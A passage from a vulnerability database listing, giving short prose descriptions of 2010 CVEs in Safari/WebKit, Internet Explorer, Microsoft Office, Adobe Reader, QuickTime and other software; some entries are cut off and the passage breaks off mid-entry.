ProcessInstruction. [CVE-2010-1402] Double free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to an event listener in an SVG document, related to duplicate event listeners, a timer, and an AnimateTransform object. [CVE-2010-1401] Use-after-free vulnerability in the Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving the :first-letter pseudo-element. [CVE-2010-1400] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving caption elements. [CVE-2010-1399] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses uninitialized memory during a selection change on a form input element, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document. [CVE-2010-1398] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly perform ordered list insertions, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document, related to the insertion of an unspecified element into an editable container and the access of an uninitialized element. [CVE-2010-1397] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to a layout change during selection rendering and the DOCUMENT_POSITION_DISCONNECTED attribute in a container of an unspecified type. [CVE-2010-1396] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the contentEditable attribute and removing container elements. [CVE-2010-1395] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving DOM constructor objects, related to a "scope management issue." [CVE-2010-1394] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving HTML document fragments. [CVE-2010-1393] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to discover sensitive URLs via an HREF attribute associated with a redirecting URL. [CVE-2010-1392] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to HTML buttons and the first-letter CSS style. [CVE-2010-1391] Multiple directory traversal vulnerabilities in the (a) Local Storage and (b) Web SQL database implementations in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allow remote attackers to create arbitrary database files via vectors involving a (1) %2f and .. (dot dot) or (2) %5c and .. (dot dot) in a URL. [CVE-2010-1390] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors related to improper UTF-7 canonicalization, and lack of termination of a quoted string in an HTML document. [CVE-2010-1389] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows user-assisted remote attackers to inject arbitrary web script or HTML via vectors involving a (1) paste or (2) drag-and-drop operation for a selection. [CVE-2010-1387] Use-after-free vulnerability in JavaScriptCore in WebKit in Apple iTunes before 9.2 on Windows, and Apple iOS before 4 on the iPhone and iPod touch, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to page transitions, a different vulnerability than CVE-2010-1763 and CVE-2010-1769. [CVE-2010-1385] Use-after-free vulnerability in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document. [CVE-2010-1384] Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not provide a warning about a (1) http or (2) https URL that contains a username and password, which makes it easier for remote attackers to conduct phishing attacks via a crafted URL. [CVE-2010-1383] CFNetwork in Apple Safari before 5.0.6 on Windows allows remote web servers to execute arbitrary code by replaying the NTLM credentials of a client user, related to a "credential reflection" issue. [CVE-2010-1322] The merge_authdata function in kdc_authdata.c in the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) 1.8.x before 1.8.4 does not properly manage an index into an authorization-data list, which allows remote attackers to cause a denial of service (daemon crash), or possibly obtain sensitive information, spoof authorization, or execute arbitrary code, via a TGS request that triggers an uninitialized pointer dereference, as demonstrated by a request from a Windows Active Directory client. [CVE-2010-1295] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2202, CVE-2010-2207, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211, and CVE-2010-2212. [CVE-2010-1285] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code via unspecified manipulations involving the newclass (0x58) operator and an "invalid pointer vulnerability" that triggers memory corruption, a different vulnerability than CVE-2010-2168 and CVE-2010-2201. [CVE-2010-1262] Microsoft Internet Explorer 6 SP1 and SP2, 7, and 8 allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, related to the CStyleSheet object and a free of the root container, aka "Memory Corruption Vulnerability." [CVE-2010-1261] The IE8 Developer Toolbar in Microsoft Internet Explorer 8 SP1, SP2, and SP3 allows user-assisted remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-1260] The IE8 Developer Toolbar in Microsoft Internet Explorer 8 SP1, SP2, and SP3 allows user-assisted remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Element Memory Corruption Vulnerability." [CVE-2010-1259] Microsoft Internet Explorer 6 SP1 and SP2, 7, and 8 allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-1258] Microsoft Internet Explorer 6, 7, and 8 does not properly determine the origin of script code, which allows remote attackers to execute script in an unintended domain or security zone, and obtain sensitive information, via unspecified vectors, aka "Event Handler Cross-Domain Vulnerability." [CVE-2010-1257] Cross-site scripting (XSS) vulnerability in the toStaticHTML API, as used in Microsoft Office InfoPath 2003 SP3, 2007 SP1, and 2007 SP2 [CVE-2010-1256] Unspecified vulnerability in Microsoft IIS 6.0, 7.0, and 7.5, when Extended Protection for Authentication is enabled, allows remote authenticated users to execute arbitrary code via unknown vectors related to "token checking" that trigger memory corruption, aka "IIS Authentication Memory Corruption Vulnerability." [CVE-2010-1254] The installation for Microsoft Open XML File Format Converter for Mac sets insecure ACLs for the /Applications folder, which allows local users to execute arbitrary code by replacing the executable with a Trojan Horse, aka "Mac Office Open XML Permissions Vulnerability." [CVE-2010-1253] Microsoft Office Excel 2002 SP3, 2007 SP1, and SP2 [CVE-2010-1252] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Excel file, aka "Excel String Variable Vulnerability." [CVE-2010-1251] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Excel file, aka "Excel Record Stack Corruption Vulnerability." [CVE-2010-1250] Heap-based buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with malformed (1) EDG (0x88) and (2) Publisher (0x89) records, aka "Excel EDG Memory Corruption Vulnerability." [CVE-2010-1249] Buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed ExternName (0x23) record, aka "Excel Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0823 and CVE-2010-1247. [CVE-2010-1248] Buffer overflow in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed HFPicture (0x866) record, aka "Excel HFPicture Memory Corruption Vulnerability." [CVE-2010-1247] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 allows remote attackers to execute arbitrary code via an Excel file with a malformed RTD (0x813) record that triggers heap corruption, aka "Excel Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0823 and CVE-2010-1249. [CVE-2010-1246] Stack-based buffer overflow in Microsoft Office Excel 2002 SP3 allows remote attackers to execute arbitrary code via an Excel file with a malformed RTD (0x813) record, aka "Excel RTD Memory Corruption Vulnerability." [CVE-2010-1245] Unspecified vulnerability in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed SxView (0xB0) record, aka "Excel Record Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0824 and CVE-2010-0821. [CVE-2010-1241] Heap-based buffer overflow in the custom heap management system in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted PDF document, aka FG-VD-10-005. [CVE-2010-1240] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, do not restrict the contents of one text field in the Launch File warning dialog, which makes it easier for remote attackers to trick users into executing an arbitrary local program that was specified in a PDF document, as demonstrated by a text field that claims that the Open button will enable the user to read an encrypted message. [CVE-2010-1184] The Microsoft wireless keyboard uses XOR encryption with a key derived from the MAC address, which makes it easier for remote attackers to obtain keystroke information and inject arbitrary commands via a nearby wireless device, as demonstrated by Keykeriki 2. [CVE-2010-1140] The USB service in VMware Workstation 7.0 before 7.0.1 build 227600 and VMware Player 3.0 before 3.0.1 build 227600 on Windows might allow host OS users to gain privileges by placing a Trojan horse program at an unspecified location on the host OS disk. [CVE-2010-1138] The virtual networking stack in VMware Workstation 7.0 before 7.0.1 build 227600, VMware Workstation 6.5.x before 6.5.4 build 246459 on Windows, VMware Player 3.0 before 3.0.1 build 227600, VMware Player 2.5.x before 2.5.4 build 246459 on Windows, VMware ACE 2.6 before 2.6.1 build 227600 and 2.5.x before 2.5.4 build 246459, VMware Server 2.x, and VMware Fusion 3.0 before 3.0.1 build 232708 and 2.x before 2.0.7 build 246742 allows remote attackers to obtain sensitive information from memory on the host OS by examining received network packets, related to interaction between the guest OS and the host vmware-vmx process. [CVE-2010-1131] JavaScriptCore.dll, as used in Apple Safari 4.0.5 on Windows XP SP3, allows remote attackers to cause a denial of service (application crash) via an HTML document composed of many successive occurrences of the <object> substring. [CVE-2010-1127] Microsoft Internet Explorer 6 and 7 does not initialize certain data structures during execution of the createElement method, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted JavaScript code, as demonstrated by setting the (1) outerHTML or (2) value property of an object returned by createElement. [CVE-2010-1119] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, Safari before 4.1 on Mac OS X 10.4, and Safari on Apple iPhone OS allows remote attackers to execute arbitrary code or cause a denial of service (application crash), or read the SMS database or other data, via vectors related to "attribute manipulation," as demonstrated by Vincenzo Iozzo and Ralf Philipp Weinmann during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1034] Unspecified vulnerability in HP System Management Homepage (SMH) 6.0 before 6.0.0-95 on Linux, and 6.0 before 6.0.0.96 on Windows, allows remote authenticated users to obtain sensitive information, modify data, and cause a denial of service via unknown vectors. [CVE-2010-0925] cfnetwork.dll 1.450.5.0 in CFNetwork, as used by safari.exe 531.21.10 in Apple Safari 4.0.4 on Windows, allows remote attackers to cause a denial of service (application crash) via a long string in the SRC attribute of a (1) IMG or (2) IFRAME element. [CVE-2010-0924] cfnetwork.dll 1.450.5.0 in CFNetwork, as used by safari.exe 531.21.10 in Apple Safari 4.0.3 and 4.0.4 on Windows, allows remote attackers to cause a denial of service (application crash) via a long string in the BACKGROUND attribute of a BODY element. [CVE-2010-0903] Unspecified vulnerability in the Net Foundation Layer component in Oracle Database Server 9.2.0.8, 10.1.0.5, 10.2.0.4, 11.1.0.7, and 11.2.0.1, when running on Windows, allows remote attackers to affect availability via unknown vectors. [CVE-2010-0900] Unspecified vulnerability in the Network Layer component in Oracle Database Server 9.2.0.8, 10.1.0.5, 10.2.0.4, 11.1.0.7, and 11.2.0.1, when running on Windows, allows remote attackers to affect availability via unknown vectors. [CVE-2010-0824] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed WOPT (0x80B) record, aka "Excel Record Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0821 and CVE-2010-1245. [CVE-2010-0823] Unspecified vulnerability in Microsoft Office Excel 2002 SP3, 2003 SP3, 2007 SP1 and SP2 [CVE-2010-0822] Stack-based buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with a crafted OBJ (0x5D) record, aka "Excel Object Stack Overflow Vulnerability." [CVE-2010-0821] Unspecified vulnerability in Microsoft Office Excel 2002 SP3, 2003 SP3, 2007 SP1 and SP2 [CVE-2010-0817] Cross-site scripting (XSS) vulnerability in _layouts/help.aspx in Microsoft SharePoint Server 2007 12.0.0.6421 and possibly earlier, and SharePoint Services 3.0 SP1 and SP2, versions, allows remote attackers to inject arbitrary web script or HTML via the cid0 parameter. [CVE-2010-0816] Integer overflow in inetcomm.dll in Microsoft Outlook Express 5.5 SP2, 6, and 6 SP1 [CVE-2010-0815] VBE6.DLL in Microsoft Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Visual Basic for Applications (VBA), and VBA SDK 6.3 through 6.5 does not properly search for ActiveX controls that are embedded in documents, which allows remote attackers to execute arbitrary code via a crafted document, aka "VBE6.DLL Stack Memory Corruption Vulnerability." [CVE-2010-0814] The Microsoft Access Wizard Controls in ACCWIZ.dll in Microsoft Office Access 2003 SP3 and 2007 SP1 and SP2 do not properly interact with the memory-allocation approach used by Internet Explorer during instantiation, which allows remote attackers to execute arbitrary code via a web site that references multiple ActiveX controls, as demonstrated by the ImexGrid and FieldList controls, aka "Access ActiveX Control Vulnerability." [CVE-2010-0807] Microsoft Internet Explorer 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, leading to memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2010-0806] Use-after-free vulnerability in the Peer Objects component (aka iepeers.dll) in Microsoft Internet Explorer 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via vectors involving access to an invalid pointer after the deletion of an object, as exploited in the wild in March 2010, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-0732] gdk/gdkwindow.c in GTK+ before 2.18.5, as used in gnome-screensaver before 2.28.1, performs implicit paints on windows of type GDK_WINDOW_FOREIGN, which triggers an X error in certain circumstances and consequently allows physically proximate attackers to bypass screen locking and access an unattended workstation by pressing the Enter key many times. [CVE-2010-0716] _layouts/Upload.aspx in the Documents module in Microsoft SharePoint before 2010 uses URLs with the same hostname and port number for a web site's primary files and individual users' uploaded files (aka attachments), which allows remote authenticated users to leverage same-origin relationships and conduct cross-site scripting (XSS) attacks by uploading TXT files, a related issue to CVE-2008-5026. NOTE: the vendor disputes the significance of this issue, because cross-domain isolation can be implemented when needed. [CVE-2010-0705] Aavmker4.sys in avast! 4.8 through 4.8.1368.0 and 5.0 before 5.0.418.0 running on Windows 2000 and XP does not properly validate input to IOCTL 0xb2d60030, which allows local users to cause a denial of service (system crash) or execute arbitrary code to gain privileges via IOCTL requests using crafted kernel addresses that trigger memory corruption. [CVE-2010-0657] Google Chrome before 4.0.249.78 on Windows does not perform the expected encoding, escaping, and quoting for the URL in the --app argument in a desktop shortcut, which allows user-assisted remote attackers to execute arbitrary programs or obtain sensitive information by tricking a user into creating a crafted shortcut. [CVE-2010-0652] Microsoft Internet Explorer permits cross-origin loading of CSS stylesheets even when the stylesheet download has an incorrect MIME type and the stylesheet document is malformed, which allows remote HTTP servers to obtain sensitive information via a crafted document. [CVE-2010-0650] WebKit, as used in Google Chrome before 4.0.249.78 and Apple Safari, allows remote attackers to bypass intended restrictions on popup windows via crafted use of a mouse click event. [CVE-2010-0559] The default configuration of Oracle OpenSolaris snv_91 through snv_131 allows attackers to have an unspecified impact via vectors related to using kclient to join a Windows Active Directory domain. [CVE-2010-0558] The default configuration of Oracle OpenSolaris snv_77 through snv_131 allows attackers to have an unspecified impact via vectors related to using smbadm to join a Windows Active Directory domain. [CVE-2010-0555] Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, 7, and 8 does not prevent rendering of non-HTML local files as HTML documents, which allows remote attackers to bypass intended access restrictions and read arbitrary files via vectors involving the product's use of text/html as the default content type for files that are encountered after a redirection, aka the URLMON sniffing vulnerability, a variant of CVE-2009-1140 and related to CVE-2008-1448. [CVE-2010-0544] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors related to a malformed URL. [CVE-2010-0536] Apple QuickTime before 7.6.6 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted BMP image. [CVE-2010-0532] Race condition in the installation package in Apple iTunes before 9.1 on Windows allows local users to gain privileges by replacing an unspecified file with a Trojan horse. [CVE-2010-0530] Apple QuickTime before 7.6.9 on Windows sets weak permissions for the Apple Computer directory in the profile of a user account, which allows local users to obtain sensitive information by reading files in this directory. [CVE-2010-0529] Heap-based buffer overflow in QuickTime.qts in Apple QuickTime before 7.6.6 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PICT image with a BkPixPat opcode (0x12) containing crafted values that are used in a calculation for memory allocation. [CVE-2010-0528] Apple QuickTime before 7.6.6 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted color tables in a movie file, related to malformed MediaVideo data, a sample description atom (STSD), and a crafted length value. [CVE-2010-0527] Integer overflow in Apple QuickTime before 7.6.6 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT image. [CVE-2010-0494] Cross-domain vulnerability in Microsoft Internet Explorer 6, 6 SP1, 7, and 8 allows user-assisted remote attackers to bypass the Same Origin Policy and conduct cross-site scripting (XSS) attacks via a crafted HTML document in a situation where the client user drags one browser window across another browser window, aka "HTML Element Cross-Domain Vulnerability." [CVE-2010-0492] Use-after-free vulnerability in mstime.dll in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via vectors related to the TIME2 behavior, the CTimeAction object, and destruction of markup, leading to memory corruption, aka "HTML Object Memory Corruption Vulnerability." [CVE-2010-0491] Use-after-free vulnerability in Microsoft Internet Explorer 5.01 SP4, 6, and 6 SP1 allows remote attackers to execute arbitrary code by changing unspecified properties of an HTML object that has an onreadystatechange event handler, aka "HTML Object Memory Corruption Vulnerability." [CVE-2010-0490] Microsoft Internet Explorer 6, 6 SP1, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-0489] Race condition in Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via a crafted HTML document that triggers memory corruption, aka "Race Condition Memory Corruption Vulnerability." [CVE-2010-0488] Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 does not properly handle unspecified "encoding strings," which allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site, aka "Post Encoding Information Disclosure Vulnerability." [CVE-2010-0479] Buffer overflow in Microsoft Office Publisher 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Microsoft Office Publisher File Conversion TextBox Processing Buffer Overflow Vulnerability." [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers." [CVE-2010-0284] Directory traversal vulnerability in the getEntry method in the PortalModuleInstallManager component in a servlet in nps.jar in the Administration Console (aka Access Management Console) in Novell Access Manager 3.1 before 3.1.2-281 on Windows allows remote attackers to create arbitrary files with any contents, and consequently execute arbitrary code, via a .. (dot dot) in a parameter, aka ZDI-CAN-678. [CVE-2010-0267] Microsoft Internet Explorer 6, 6 SP1, and 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-0266] Microsoft Office Outlook 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 does not properly verify e-mail attachments with a PR_ATTACH_METHOD property value of ATTACH_BY_REFERENCE, which allows user-assisted remote attackers to execute arbitrary code via a crafted message, aka "Microsoft Outlook SMB Attachment Vulnerability." [CVE-2010-0264] Microsoft Office Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Microsoft Office Excel DbOrParamQry Record Parsing Vulnerability." [CVE-2010-0263] Microsoft Office Excel 2007 SP1 and SP2 [CVE-2010-0262] Microsoft Office Excel 2007 SP1 and SP2 and Office 2004 for Mac do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet that triggers access of an uninitialized stack variable, aka "Microsoft Office Excel FNGROUPNAME Record Uninitialized Memory Vulnerability." [CVE-2010-0261] Heap-based buffer overflow in Microsoft Office Excel 2007 SP1 and SP2 and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted spreadsheet in which "a MDXSET record is broken up into several records," aka "Microsoft Office Excel MDXSET Record Heap Overflow Vulnerability." [CVE-2010-0260] Heap-based buffer overflow in Microsoft Office Excel 2007 SP1 and SP2 [CVE-2010-0258] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2010-0257] Microsoft Office Excel 2002 SP3 does not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Microsoft Office Excel Record Memory Corruption Vulnerability." [CVE-2010-0256] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 and SP2 does not properly calculate unspecified indexes associated with Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Visio Index Calculation Memory Corruption Vulnerability." [CVE-2010-0255] Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, 7, and 8 does not prevent rendering of non-HTML local files as HTML documents, which allows remote attackers to bypass intended access restrictions and read arbitrary files via vectors involving JavaScript exploit code that constructs a reference to a file://127.0.0.1 URL, aka the dynamic OBJECT tag vulnerability, as demonstrated by obtaining the data from an index.dat file, a variant of CVE-2009-1140 and related to CVE-2008-1448. [CVE-2010-0254] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 and SP2 does not properly validate attributes in Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Visio Attribute Validation Memory Corruption Vulnerability." [CVE-2010-0248] Microsoft Internet Explorer 6, 6 SP1, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Object Memory Corruption Vulnerability." [CVE-2010-0247] Microsoft Internet Explorer 5.01 SP4, 6, and 6 SP1 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-0246] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-3671, CVE-2009-3674, and CVE-2010-0245. [CVE-2010-0245] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-3671, CVE-2009-3674, and CVE-2010-0246. [CVE-2010-0244] Microsoft Internet Explorer 6, 6 SP1, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-2530 and CVE-2009-2531. [CVE-2010-0243] Buffer overflow in MSO.DLL in Microsoft Office XP SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Office document, aka "MSO.DLL Buffer Overflow." [CVE-2010-0204] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allow attackers to cause a denial of service (memory corruption) or execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0194, CVE-2010-0197, and CVE-2010-0201. [CVE-2010-0203] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0198, CVE-2010-0199, and CVE-2010-0202. [CVE-2010-0202] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0198, CVE-2010-0199, and CVE-2010-0203. [CVE-2010-0201] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allow attackers to cause a denial of service (memory corruption) or execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0194, CVE-2010-0197, and CVE-2010-0204. [CVE-2010-0199] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0198, CVE-2010-0202, and CVE-2010-0203. [CVE-2010-0198] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0199, CVE-2010-0202, and CVE-2010-0203. [CVE-2010-0197] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allow attackers to cause a denial of service (memory corruption) or execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0194, CVE-2010-0201, and CVE-2010-0204. [CVE-2010-0196] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2010-0192 and CVE-2010-0193. [CVE-2010-0195] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, do not properly handle fonts, which allows attackers to execute arbitrary code via unspecified vectors. [CVE-2010-0194] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allow attackers to cause a denial of service (memory corruption) or execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0197, CVE-2010-0201, and CVE-2010-0204. [CVE-2010-0193] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2010-0192 and CVE-2010-0196. [CVE-2010-0192] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2010-0193 and CVE-2010-0196. [CVE-2010-0191] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allow attackers to execute arbitrary code via unspecified vectors, related to a "prefix protocol handler vulnerability." [CVE-2010-0190] Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0161] The nsAuthSSPI::Unwrap function in extensions/auth/nsAuthSSPI.cpp in Mozilla Thunderbird before 